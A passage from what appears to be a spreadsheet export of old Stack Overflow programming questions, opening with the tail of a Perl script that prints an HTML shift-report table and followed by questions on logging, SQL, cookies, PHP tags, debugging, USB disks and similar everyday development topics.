print "&amp;lt;head&amp;gt;";
print "&amp;lt;body bgcolor='#4682B4'&amp;gt;";
print "&amp;lt;title&amp;gt;FUSION SHIFT REPORT&amp;lt;/title&amp;gt;";
print "&amp;lt;div align='left'&amp;gt;";
print "&amp;lt;TABLE CELLPADDING='1' CELLSPACING='1' BORDER='1' bordercolor=black width='100%'&amp;gt;";
print "&amp;lt;TR&amp;gt;";
print "&amp;lt;td width='12%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;RECORD No.&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='12%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;TESTER No.&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='12%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;DATE&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='13%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;TIME&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='11%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;DEVICE NAME&amp;lt;/td&amp;gt;";
print "&amp;lt;td bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;TEST PROGRAM&amp;lt;/td&amp;gt;";
print "&amp;lt;td bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;DEVICE FAMILY&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='13%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;SMSLOT&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='13%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;DIE LOT&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='12%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;LOADBOARD&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='12%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;TESTER &amp;lt;/td&amp;gt;";
print "&amp;lt;td width='12%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;SERIAL NUMBER&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='13%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;TESTER CONFIG&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='11%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;SMSLOT&amp;lt;/td&amp;gt;";
print "&amp;lt;td bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;PACKAGE&amp;lt;/td&amp;gt;";
print "&amp;lt;td bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;SOCKET&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='13%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;ROOT CAUSE 1&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='13%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;ROOT CAUSE 2&amp;lt;/td&amp;gt;";
print "&amp;lt;td width='13%'bgcolor='#00ff00'&amp;gt;&amp;lt;font size='2'&amp;gt;ROOT CAUSE 3&amp;lt;/td&amp;gt;";
print "&amp;lt;/tr&amp;gt;";
print "&amp;lt;TR&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f1&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f2&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f3&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f4&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f5&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f6&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f7&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f8&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f9&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f10&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f11&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f12&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f13&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f14&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f15&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f16&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f17&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f18&amp;lt;/TD&amp;gt;";
print "&amp;lt;TD bgcolor='#ADD8E6'&amp;gt;&amp;lt;font size='2'&amp;gt;$f19&amp;lt;/TD&amp;gt;";
print "&amp;lt;/tr&amp;gt;";
print "&amp;lt;/TABLE&amp;gt;";
print "&amp;lt;/body&amp;gt;";
print "&amp;lt;html&amp;gt;";
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Apache commons httpclient - disable debugging / lower debuglevel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am using the apache commons httpclient in a lotus notes java agent and it works fine. BUT when establishing a proxy connection the log will be spamed with the following line :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[INFO] AuthChallengeProcessor - basic authentication scheme selected
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do you know how to disable the integrated loging or how to set a lower debug level ?
Its a "feature" from the httpclient itself, so code from my side is not needed :-)&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you use an alias in the WHERE clause in mysql?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to use an alias in the WHERE clause, but It keeps telling me that its an unknown column. Is there any way to get around this issue? I need to select records that have a rating higher than x. Rating is calculated as the following alias:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sum(reviews.rev_rating)/count(reviews.rev_id) as avg_rating
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I remove a cookie that I've set on someone's computer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a web system where users log in, and it stores a cookie of their session. When they log in as someone else or log out I want to remove that original cookie that I stored. What's the best way to do that?
I'm using Python and Apache, though I suppose the answer will remain the same for most languages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the technical term for C# or Java type languages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is probably a very simple question, but what is the technical term for this class of language?  &lt;/p&gt;
&lt;p&gt;They use an "intermediate" assembly type language which is sent through the JVM or CLR.  They both are object oriented and they both depend on an intermediary such as the Java Virtual Machine or the Common Language Runtime to compile into native machine laguage.  &lt;/p&gt;
&lt;p&gt;Unlike Asm/C/C++ they don't compile directly into native machine language and require intensive memory allocation knowledge.  They both use garbage collection.  &lt;/p&gt;
&lt;p&gt;Is there a technical term which seperates Java and C# from C++?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Removing one Installer from another installer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a custom intall dll &amp;amp; everything is working fine.I just want to call another installer's Uninstall method from my current installation.When i do this i get error code 1618(signifies another installer is already running).However when i call the uninstall of the same product form a test project it is working fine.Could anyone suggest a solution to this.Can i uninstall another application from current installer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there design patterns on modelling a structure containing Teams, Roles and Skills?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to model a system where by there will be a team who will consist of users who perform roles in the team and have skills assigned to them.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;i.e. a team A 5 members, one performs the team leader role, all perform the reply to
email role, but some have an extra skill to answer the phone&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I'm trying to determine how I can best model this. &lt;/p&gt;
&lt;p&gt;This problem must have been solved before, are there any good resources on how to model this?&lt;/p&gt;
&lt;p&gt;EDIT: I need to determine what a user is allowed to do, which could be because they are in a certain team, perform a certain role or have been assigned a certain skill&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Please recommend me a professional keepalive solution for our monitoring server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a tool that can be installed on our monitoring server and which allows us to perform scheduled requests to our web sites in order to keep them from shutting down (asp.net).&lt;/p&gt;
&lt;p&gt;I don't want to use a web service since we already have a dedicated monitoring server. Our monitoring software doesn't really have the ability to do this without using some ugly workaround.&lt;/p&gt;
&lt;p&gt;I could probably write my own but I'm a bit short on time atm.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Update column from another table - mySQL 3.5.2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've tried a couple of approaches to update a column in a mySQL database table from another table but am not having any luck. &lt;/p&gt;
&lt;p&gt;I read somewhere that version 3.5.2 does not support multi-table updates and I need a code-based solution - is that correct?&lt;/p&gt;
&lt;p&gt;If not can anybody point me in the right direction using sql? &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UPDATE products SET products_ordered = (
    SELECT SUM(products_quantity) 
    FROM orders_products 
    WHERE products_id = products.products_id
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Create temporary table my_temp_table
as
SELECT products_id, SUM(products_quantity) as total 
FROM orders_products 
GROUP BY products_id 
UPDATE products, my_temp_table
SET products.products_ordered = my_temp_table.total 
WHERE products.products_id = my_temp_table.products_id
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Style sheet images aren't reloaded by Firefox or Safari</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have found out that Firefox (at least v3) and Safari don't properly cache images referenced from a css file. The images are cached, but they are never refreshed, even if you change them on the server. Once Firefox has the image in the cache, it will never check if it has changed.&lt;/p&gt;
&lt;p&gt;Our css file looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;div#news {
  background: #FFFFFF url(images/newsitem_background.jpg) no-repeat;
  ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that if we now change the newsitem_background.jpg image, all Firefox users will still get the old image, unless they explicitly refresh the page. IE on the other hand, detects that the image has changed and reloads it automatically.&lt;/p&gt;
&lt;p&gt;Is this a known problem? Any workarounds? Thanks!&lt;/p&gt;
&lt;p&gt;EDIT: The solution is not to press F5. I can do this. But our clients will just visit our web site, and get the old, outdated graphics. How would they know they would need to press F5?&lt;/p&gt;
&lt;p&gt;I have installed Firebug and confirmed what I already suspected: Firefox just doesn't even try to retrieve images referenced from a css file, to find out if they have been changed. When you press F5, it does check all images, and the web server nicely responds with 304, except for those that &lt;em&gt;have&lt;/em&gt; changed, where it responds with 200 OK.&lt;/p&gt;
&lt;p&gt;So, is there a way to urge Firefox to &lt;em&gt;automatically&lt;/em&gt; update an image that is referenced from a css file? Surely I'm not the only one with this problem?&lt;/p&gt;
&lt;p&gt;EDIT2: I tested this with localhost, and the image response doesn't contain any caching information, it's:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server  Microsoft-IIS/5.1
X-Powered-By    ASP.NET
Date    Tue, 14 Oct 2008 11:01:27 GMT
Content-Type    image/jpeg
Accept-Ranges   bytes
Last-Modified   Tue, 14 Oct 2008 11:00:43 GMT
Etag    "7ab3aa1aec2dc91:9f4"
Content-Length  61196
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT3: I've done some more reading and it looks like it just can't be fixed, since Firefox, or most browser, will just assume an image doesn't change very often (expires header and all).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>To which kind of problem is functional programming well suited?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Functional programming seems to be a paradigm in computer science which has more and more echo.&lt;/p&gt;
&lt;p&gt;I wonder which kind of problems are better solved with a functional programming approach rather than with a more traditional object oriented approach.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trapping messages in MFC - Whats the difference?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was just wondering what (if any) the difference was between the following two message traps in MFC for the function, OnSize(..).&lt;/p&gt;
&lt;h1&gt;1 - Via Message map:&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;BEGIN_MESSAGE_MAP(CClassWnd, CBaseClassWnd)
...
    ON_WM_SIZE()
..
END_MESSAGE_MAP()
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;2 - Via afx_message:&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;afx_msg type OnSize(...);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;They seem to be used interchangeably, which one should be used or does it depend on other factors?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are PHP short tags acceptable to use?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the information &lt;a href="http://www.php.net/manual/en/language.basic-syntax.php"&gt;according to the official documentation&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;There are four different pairs of
  opening and closing tags which can be
  used in PHP. Two of those, &lt;code&gt;&amp;lt;?php ?&amp;gt;&lt;/code&gt;
  and &lt;code&gt;&amp;lt;script language="php"&amp;gt; &amp;lt;/script&amp;gt;&lt;/code&gt;,
  are always available. The other two
  are short tags and ASP style tags, and
  can be turned on and off from the
  php.ini configuration file. As such,
  while some people find short tags and
  ASP style tags convenient, they are
  less portable, and &lt;strong&gt;generally not
  recommended&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In my experience most servers &lt;em&gt;do&lt;/em&gt; have short tags enabled. Typing&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?=
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is far more convenient than typing&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php echo 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The programmers convenience is an important factor, so &lt;strong&gt;why&lt;/strong&gt; are they not recommended?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I do access control via an SQL table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create an access control system. &lt;/p&gt;
&lt;p&gt;Here's a stripped down example of what the table I'm trying to control access to looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;things table:
id   group_id   name
1    1          thing 1
2    1          thing 2
3    1          thing 3
4    1          thing 4
5    2          thing 5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the access control table looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;access table:
user_id  type   object_id  access
1        group  1          50
1        thing  1          10
1        thing  2          100
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Access can be granted either by specifying the id of the 'thing' directly, or granted for an entire group of things by specifying a group id. In the above example, user 1 has been granted an access level of 50 to group 1, which should apply unless there are any other rules granting more specific access to an individual thing.&lt;/p&gt;
&lt;p&gt;I need a query that returns a list of things (ids only is okay) along with the access level for a specific user. So using the example above I'd want something like this for user id 1:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;desired result:
thing_id   access
1          10
2          100
3          50   (things 3 and 4 have no specific access rule,
4          50   so this '50' is from the group rule)
5               (thing 5 has no rules at all, so although I 
                still want it in the output, there's no access
		level for it)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The closest I can come up with is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * 
FROM things 
LEFT JOIN access ON 
	user_id = 1
	AND (
		(access.type = 'group' AND access.object_id = things.group_id)
		OR (access.type = 'thing' AND access.object_id = things.id)
	)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that returns multiple rows, when I only want one for each row in the 'things' table. I'm not sure how to get down to a single row for each 'thing', or how to prioritise 'thing' rules over 'group' rules.&lt;/p&gt;
&lt;p&gt;If it helps, the database I'm using is PostgreSQL.&lt;/p&gt;
&lt;p&gt;Please feel free to leave a comment if there's any information I've missed out. &lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to dynamically set which properties get bound to a DataGridView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My DataGridView needs to support a number of types and these types may have any number of public properties, not all of which I want to display.&lt;/p&gt;
&lt;p&gt;Can anyone suggest a way to dynamically customise a DataGridView's columns when binding a class a datasource? Is there an attribute that will tell a control whether to use a property as a column for example?&lt;/p&gt;
&lt;p&gt;Advice appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can an Adobe AIR Application run via the command line output to console?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an AIR application that takes command-line arguments via onInvoke. All is good, but I cannot figure out how to print some status messages back to the user (to stdout / console, so to speak). Is it possible?&lt;/p&gt;
&lt;p&gt;Even a default log file for traces would be fine, but I can't find any info about it anywhere. Do I need to create my own log file? Now that'd be silly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: Popup browser windows and session cookies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;SUMMARY: When browsing an ASP.NET website using Windows Explorer, popup windows do not "borrow" the session cookie from the parent window.&lt;/p&gt;
&lt;p&gt;DETAILS:&lt;/p&gt;
&lt;p&gt;I'm working on an ASP.NET website (.NET 2.0). I use FormsAuthentication. It is a requirement to use cookies to handle the session.&lt;/p&gt;
&lt;p&gt;On a page I have a button. When the user clicks it, a popup window is opened. The popup displays an ASPX page that uses session variables, previously set from the parent browser window. I've been testing the website using IE (6, 7, 8) and Firefox 2.0. On all these browsers, the popup window has access to the same session as the parent browser window and everything works ok.&lt;/p&gt;
&lt;p&gt;I now have a bug raised by the client, stating that the popup window displays an error. Looking at the log file, I can see that it is a NullReferenceException at the moment the popup page tries to access the session variables. Talking with the client, he said that he opened the main website in Windows Explorer !!!&lt;/p&gt;
&lt;p&gt;I've managed to recreate the issue on a test machine and saw that the popup is using a new session.&lt;/p&gt;
&lt;p&gt;The machine must have Win XP an IE6 installed !  With IE7 the website works ok.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieving values in reflected types from reflected properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to access some members marked internal that are declared in a third party assembly.&lt;/p&gt;
&lt;p&gt;I would like to return a value from a particular internal property in a class. Then I'd like to retrieve a value from a property on that returned value. However, these properties return types that are also internal and declared in this third party assembly.&lt;/p&gt;
&lt;p&gt;The examples of doing this I've seen are simple and just show returning int or bool. Can someone please give some example code that handles this more complex case?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Embedding Intellisense Xml Documentation in Assembly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an assembly containing very thorough XML-based documentation, which is used through Sandcastle to generate the help-files for the product. We also use the output XML files for providing proper Intellisense in Visual Studio when programmers use the assembly obviously.&lt;/p&gt;
&lt;p&gt;In order to do this, it seems we have do both supply the user with the assembly ("assembly.dll") and the documentation ("assembly.xml"). &lt;/p&gt;
&lt;p&gt;Is it somehow possible to embed the documentation within the assembly, so we'd only have to supply the single assembly-file and Visual Studio would be able to extract the information? Maybe embedded as a resource or something like that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find all storage devices attached to a Linux machine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a need to find all of the writable storage devices attached to a given machine, &lt;strong&gt;whether or not&lt;/strong&gt; they are mounted.&lt;/p&gt;
&lt;p&gt;The dopey way to do this would be to &lt;em&gt;try&lt;/em&gt; every entry in &lt;code&gt;/dev&lt;/code&gt; that corresponds to a writable devices (&lt;code&gt;hd* and sd*&lt;/code&gt;)......&lt;/p&gt;
&lt;p&gt;Is there a better solution, or should I stick with this one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to decode a CSR File?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I ran accross a CSR file (Certificate Signing Request) and I need to extract some information from it.&lt;/p&gt;
&lt;p&gt;There's a way to decode it using .NET Framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Be notified when visual/logical child added/removed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently looking for a way to be notified when a child is added to the visual or logical children.&lt;/p&gt;
&lt;p&gt;I am aware of the Visual::OnVisualChildrenChanged method, but it does not apply to me since I can't always inherit and override this function.  I am looking for an event.&lt;/p&gt;
&lt;p&gt;So, is there a way for the owner of a FrameworkElement/Visual to be notified when a child is added?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mounting/Unmounting USB disks on Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On Windows Server, by default, external USB disks don't always get mounted. I'd like my program (written in C#) to be able to detect external USB disks, identify them, and then mount them.&lt;/p&gt;
&lt;p&gt;When it's finished, it should do whatever the programmatic equivalent of "Safely Remove Hardware" in order to flush and unmount the disk.&lt;/p&gt;
&lt;p&gt;Any pointers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to host a TCP endpoint in an IIS6 hosted service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created a wcf service based on ServiceHostFactory, and i'm hosting it in IIS6.
If i use a HTTP endpoint everything works just fine, but when i try to switch to TCP it goes bad.&lt;/p&gt;
&lt;p&gt;Is it even possible to do this in II6?&lt;/p&gt;
&lt;p&gt;I have a more specific question posted here, that asks for a solution, but i would be happy with (for starters if not) with just an answer (and perhaps an example) to this - less specific question.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/201004/why-cant-i-connect-to-a-wcf-service-with-nettcp-but-i-can-with-http"&gt;http://stackoverflow.com/questions/201004/why-cant-i-connect-to-a-wcf-service-with-nettcp-but-i-can-with-http&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the most efficient way to handle en expired session with ASP.NET 2.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On the site we are building. We need to be able to redirect the user to a default page when his session has ended.&lt;/p&gt;
&lt;p&gt;At first sight we used the Session_End with a Response.Redirect to do this job.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sub Session_End(ByVal sender As Object, ByVal e As EventArgs)
    Response.Redirect("~/global/exit.aspx")
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it generates a crapload of &lt;em&gt;Response is not available in this context&lt;/em&gt; errors. Naturally we don't want to spam our servers error logs.&lt;/p&gt;
&lt;p&gt;What is the most efficient way to handle session ending with ASP.NET 2.0?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Inheritance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had a coworker see this the other day and I'm not quite sure why this happened. Can anyone explain it?&lt;/p&gt;
&lt;p&gt;We have class A:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Data;
public class A
{
  protected DataTable _table;
  public A()
  {
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We have class B that inherits from class A (assume there in the same namespace):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
public class B : A
{
  public B()
  {
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the constructor of class B, if I try this._table, it doesn't compile? Why does it not?&lt;/p&gt;
&lt;p&gt;But to get it to work, I have to add using System.Data; and everything works fine.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why does .NET not do this for me? So that when I try to access the protected member, it knows that its a System.Data.DataTable?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;forgive me if the classes are 100% correct...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio debugger tips &amp; tricks for .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been working for years with VS's debugger, but every now and then I come across a feature I have never noticed before, and think "Damn! How could I have missed that? It's &lt;strong&gt;so&lt;/strong&gt; useful!"&lt;/p&gt;
&lt;p&gt;[Disclaimer: These tips work in VS 2005 on a C# project, no guarantees for older incarnations of VS or other languages] &lt;/p&gt;
&lt;h3&gt;Keep track of object instances&lt;/h3&gt;
&lt;p&gt;Working with multiple instances of a given class? How can you tell them apart?
In pre-garbage collection programming days, it was easy to keep track of references - just look at the memory address. With .NET, you can't do that - objects can get moved around.
Fortunately, the watches view lets you right-click on a watch and select 'Make Object ID'. &lt;/p&gt;
&lt;blockquote&gt;
  &lt;blockquote&gt;
    &lt;p&gt;&lt;img src="http://img403.imageshack.us/img403/461/52518188cq3.jpg" alt="watches view" /&gt; &lt;/p&gt;
  &lt;/blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;This appends a {1#}, {2#} etc. after the instance's value, effectively giving the instance a unique label. It looks like this: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;blockquote&gt;
    &lt;p&gt;&lt;img src="http://img383.imageshack.us/img383/7351/11732685bl8.jpg" alt="numbered instance" /&gt;&lt;/p&gt;
  &lt;/blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;The label is persisted for the lifetime of that object.&lt;/p&gt;
&lt;h3&gt;Meaningful values for watched variables&lt;/h3&gt;
&lt;p&gt;By default, a watched variable's value is it's type. If you want to see its fields, you have to expand it, and this could take a long time (or even timeout!) if there are many fields or they do something complicated.&lt;/p&gt;
&lt;p&gt;However, some predefined types show more meaningful information :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;strings show their actual contents&lt;/li&gt;
&lt;li&gt;lists and dictionaries show their elements count etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="http://img205.imageshack.us/img205/4808/37220487md1.jpg" alt="meaningful info" /&gt;&lt;/p&gt;
&lt;p&gt;Wouldn't it be nice to have that for my own types? &lt;/p&gt;
&lt;p&gt;Hmm... &lt;/p&gt;
&lt;p&gt;...some quality time with .NET Reflector shows how easily this can be accomplished with the &lt;code&gt;DebuggerDisplay&lt;/code&gt; attribute on my custom type:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[System.Diagnostics.DebuggerDisplay("Employee: '{Name}'")]
public class Employee {
    public string Name { get { ... } }
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... re-run, and...&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img60.imageshack.us/img60/926/79816018ha1.jpg" alt="ta da!" /&gt;&lt;/p&gt;
&lt;p&gt;There's a lot more info on the subject here: &lt;a href="http://msdn.microsoft.com/en-us/magazine/cc163974.aspx" rel="nofollow"&gt;MSDN&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Break on all exceptions&lt;/h3&gt;
&lt;p&gt;... even the ones that are handled in code!
I know, I'm such a n00b for not knowing about this ever since I was born, but here it goes anyway - maybe this will help someone someday:&lt;/p&gt;
&lt;p&gt;You can force a debugged process to break into debug mode each time an exception is thrown. Ever went on a bug hunt for hours only to come across a piece of code like this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try {
    runStrangeContraption();
} catch(Exception ex) {
    /* TODO: Will handle this error later */
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Catching all exceptions is really handy in these cases.
This can be enabled from &lt;em&gt;Debug &gt; Exceptions... (Ctrl-Alt-E)&lt;/em&gt;. Tick the boxes in the 'Thrown' column for each type of exception you need.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Those were a few forehead-slapping moments for me. 
Would you care to share yours?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I code desktop monitoring software?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to develop a tool for monitoring helpdesk agents. I can figure out how to capture keyboard events and mouse events; however I need to capture the control that emitted/consumed the event too. Is it possible to find that out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I add multiple identical elements to a div with jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to add multiple empty divs to a container element using jQuery.&lt;/p&gt;
&lt;p&gt;At the moment I am generating a string containing the empty html using a loop&lt;/p&gt;
